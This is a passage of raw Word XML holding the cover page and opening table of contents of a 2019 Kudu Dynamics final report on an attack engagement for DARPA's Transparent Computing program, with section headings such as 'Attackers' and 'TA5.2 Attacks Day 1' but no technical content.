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1DC30" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRDefault="004D40AC" w:rsidP="004D40AC"/>
    <w:p w14:paraId="066918B3" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRDefault="004D40AC" w:rsidP="004D40AC"/>
    <w:p w14:paraId="08E536DD" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRDefault="004D40AC" w:rsidP="004D40AC"/>
    <w:p w14:paraId="5C7679BA" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00773698" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="3" w:color="4472C4" w:themeColor="accent1"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00773698">
        <w:t>DARPA Transparent Computing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4828AC50" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="0057511B" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057511B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Kudu Dynamics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B674770" w14:textId="6375FA0E" w:rsidR="004D40AC" w:rsidRPr="0057511B" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057511B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">TA5.1 Final Report Engagement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C6D61" w14:textId="2CD9C12C" w:rsidR="004D40AC" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Revision 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576CE5F9" w14:textId="03D03C3D" w:rsidR="004D40AC" w:rsidRPr="00773698" w:rsidRDefault="00240805" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>June 28</w:t>
      </w:r>
      <w:r w:rsidR="00E60161">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004D40AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BF6318" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="007C5ED6" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544936D5" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRDefault="004D40AC" w:rsidP="004D40AC"/>
    <w:p w14:paraId="17C95C2D" w14:textId="308375A4" w:rsidR="004D40AC" w:rsidRDefault="001267DA" w:rsidP="001267DA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001267DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E44E547" wp14:editId="741CA051">
            <wp:extent cx="3581400" cy="358140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1400" cy="3581400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4DC61F" w14:textId="4764AFC0" w:rsidR="00D20BD7" w:rsidRDefault="001267DA" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FA8650-15-C-7560</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB7447E" w14:textId="77777777" w:rsidR="001267DA" w:rsidRDefault="001267DA" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ECF3D05" w14:textId="77777777" w:rsidR="001267DA" w:rsidRPr="00F44C32" w:rsidRDefault="001267DA" w:rsidP="001267DA">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44C32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kudu Dynamics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F64D923" w14:textId="77777777" w:rsidR="001267DA" w:rsidRPr="00F44C32" w:rsidRDefault="001267DA" w:rsidP="001267DA">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44C32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14425 Penrose Pl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEAD1FA" w14:textId="77777777" w:rsidR="001267DA" w:rsidRPr="00F44C32" w:rsidRDefault="001267DA" w:rsidP="001267DA">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suite 40</w:t>
      </w:r>
      <w:r w:rsidRPr="00F44C32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8661DA" w14:textId="77777777" w:rsidR="001267DA" w:rsidRPr="00F44C32" w:rsidRDefault="001267DA" w:rsidP="001267DA">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F44C32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chantilly, VA 20151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C178ED4" w14:textId="77777777" w:rsidR="001267DA" w:rsidRDefault="001267DA" w:rsidP="004D40AC"/>
    <w:p w14:paraId="53D35619" w14:textId="0022AA81" w:rsidR="004D40AC" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3537AD3A" wp14:editId="33FD663C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-734695</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>400685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7887335" cy="1145540"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1" name="Picture 1" descr="../src/kududyn/Corporate/Corporate/Images/Kudu_Dynamics/Kudu_Dynamics_Final_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c/kududyn/Corporate/Corporate/Images/Kudu_Dynamics/Kudu_Dynamics_Final_Document.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7887335" cy="114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3DCDA" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:sectPr w:rsidR="004D40AC" w:rsidSect="006C3099">
          <w:headerReference w:type="default" r:id="rId10"/>
          <w:footerReference w:type="even" r:id="rId11"/>
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="2059739961"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="39454CD1" w14:textId="270D1EC9" w:rsidR="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00147BFC">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
            <w:ind w:left="432" w:hanging="432"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5C4EEA24" w14:textId="530F5693" w:rsidR="006C1F33" w:rsidRDefault="00FC027E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc12599990" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kudu Dynamics TA5.1 TRADECRAFT Summary</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12599990 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A7959B8" w14:textId="6007B319" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12599991" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12599991 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C73BE3C" w14:textId="5C800FEE" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12599992" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attackers</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12599992 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F55EE31" w14:textId="632B2513" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12599993" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Schedule</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12599993 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E9FCB4F" w14:textId="33ECEED1" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12599994" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/08/2019: TA5.2 Attacks Day 1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12599994 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="734752C3" w14:textId="5A649873" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12599995" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Schedule</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
